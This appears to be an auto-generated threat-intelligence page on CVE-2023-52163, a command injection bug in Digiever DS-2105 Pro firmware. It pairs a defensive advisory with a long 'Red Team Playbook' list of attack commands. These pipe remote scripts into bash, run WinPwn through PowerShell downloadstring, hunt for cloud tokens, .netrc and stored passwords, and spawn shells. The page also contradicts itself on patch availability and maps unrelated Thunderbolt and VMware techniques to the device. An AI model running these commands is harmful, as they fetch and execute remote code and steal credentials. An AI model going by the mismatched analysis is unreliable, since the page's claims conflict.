CVE-2023-52163
Overview
This vulnerability is a command injection flaw caused by improper input sanitization in the time_tzsetup.cgi component of Digiever DS-2105 Pro firmware version 3.1.0.71-11. Specifically, the affected CGI script fails to validate user-supplied parameters, allowing injection of arbitrary shell commands. The vulnerability resides in the device's web management interface, particularly in the processing of POST requests to the /cgi-bin/cgi_main.cgi endpoint.
Vulnerability Description
Digiever DS-2105 Pro 3.1.0.71-11 devices allow time_tzsetup.cgi Command Injection. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Impact
An unauthenticated attacker can remotely execute arbitrary commands on the affected device, potentially resulting in full system compromise. This includes the ability to manipulate device configuration, access sensitive data, or disrupt device operation. Because no user interaction or authentication is required, exploitation can be performed remotely by any attacker with network access to the device's management interface. This may lead to unauthorized control over the device and lateral movement within the network environment.
Solution
According to vendor advisories referenced by TXOne and Akamai, users should upgrade Digiever DS-2105 Pro devices to a fixed firmware version beyond 3.1.0.71-11 where the command injection vulnerability is addressed. Detailed patch instructions and updates are available in the advisories at https://www.txone.com/blog/digiever-fixes-sorely-needed/ and https://www.akamai.com/blog/security-research/digiever-fix-that-iot-thing. Since affected products are no longer supported by the maintainer, replacement or network segmentation is recommended if patching is not feasible.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Digiever DS-2105 Pro devices stems from a command injection flaw within the time_tzsetup.cgi script. This vulnerability allows an attacker to execute arbitrary commands on the underlying operating system by manipulating input parameters sent to the web interface. The affected firmware version, 3.1.0.71-11, lacks adequate input validation, enabling malicious actors to inject commands that the system will execute with the privileges of the web server. Given that this vulnerability affects devices that are no longer supported by the vendor, the risk is exacerbated as there are no patches or updates available to remediate the issue.
Exploitation of this vulnerability can occur through various attack vectors, primarily via the web interface of the device. An attacker could craft a specially designed HTTP request that includes malicious payloads targeting the time_tzsetup.cgi script. Once the command injection is successful, the attacker could gain control over the device, potentially leading to further exploitation of the network it resides on. Scenarios may include unauthorized access to sensitive data, manipulation of device settings, or even lateral movement within the network to compromise other connected devices. The ease of exploitation, combined with the lack of vendor support, makes this vulnerability particularly concerning for organizations still utilizing these devices.
The real-world impact of this vulnerability can be significant, especially for businesses relying on the Digiever DS-2105 Pro for surveillance or data storage. Successful exploitation could lead to unauthorized access to video feeds or stored data, resulting in privacy violations and potential legal ramifications. Furthermore, if an attacker uses the compromised device as a foothold into the broader network, it could lead to more extensive breaches, data loss, or disruption of services. The business risk is compounded by the potential for reputational damage, loss of customer trust, and financial consequences associated with remediation efforts and regulatory fines.
To detect and mitigate this vulnerability, organizations should first conduct a thorough inventory of their network to identify any instances of the affected Digiever devices. Regular security assessments, including vulnerability scanning and penetration testing, can help uncover potential exploitation avenues. Given the lack of vendor support, organizations should consider implementing network segmentation to isolate these devices from critical systems and sensitive data. Additionally, employing intrusion detection systems (IDS) can help monitor for unusual traffic patterns or unauthorized access attempts related to the vulnerable devices. In the absence of a patch, organizations may also explore the possibility of replacing unsupported devices with more secure alternatives that receive regular updates and support.
In conclusion, the command injection vulnerability in Digiever DS-2105 Pro devices poses a serious threat to organizations that continue to use unsupported firmware. The potential for exploitation through the web interface, combined with the significant real-world impacts on business operations and data security, necessitates immediate attention. By implementing robust detection and mitigation strategies, organizations can reduce their risk exposure and safeguard their networks against potential threats stemming from this vulnerability.
CSURFACE threat intelligence has detected a modest but clear uptick in activity related to CVE-2023-52163, reflecting a growing interest from threat actors in targeting the Digiever DS-2105 Pro devices despite their unsupported status. This increase in telemetry signals a potential shift in attacker focus or opportunistic scanning campaigns, underscoring that legacy vulnerabilities remain attractive targets. Although no new exploit techniques or ransomware affiliations have been identified, the persistence of exploitation attempts highlights ongoing risk for organizations continuing to operate these devices. Consequently, the threat level remains elevated, with a reinforced need for vigilance given the vulnerability’s high severity and the demonstrated willingness of adversaries to probe exposed systems.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Digiever | Ds-2105 Pro Firmware | 3.1.0.71-11 |
cpe:2.3:o:digiever:ds-2105_pro_firmware:3.1.0.71-11:*:*:*:*:*:*:*
|
|
|
Digiever | Ds-2105 Pro\+ Firmware | 3.1.0.71-11 |
cpe:2.3:o:digiever:ds-2105_pro\+_firmware:3.1.0.71-11:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-52163 |
| txone.com |
GitHub CVE
|
https://www.txone.com/blog/digiever-fixes-sorely-needed/ |
| akamai.com |
GitHub CVE
|
https://www.akamai.com/blog/security-research/digiever-fix-that-iot-thing |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-52163 |
| fortinet.com |
NVD API
Exploit
Third Party Advisory
|
https://www.fortinet.com/blog/threat-research/shadowv2-casts-a-shadow-over-iot-devices |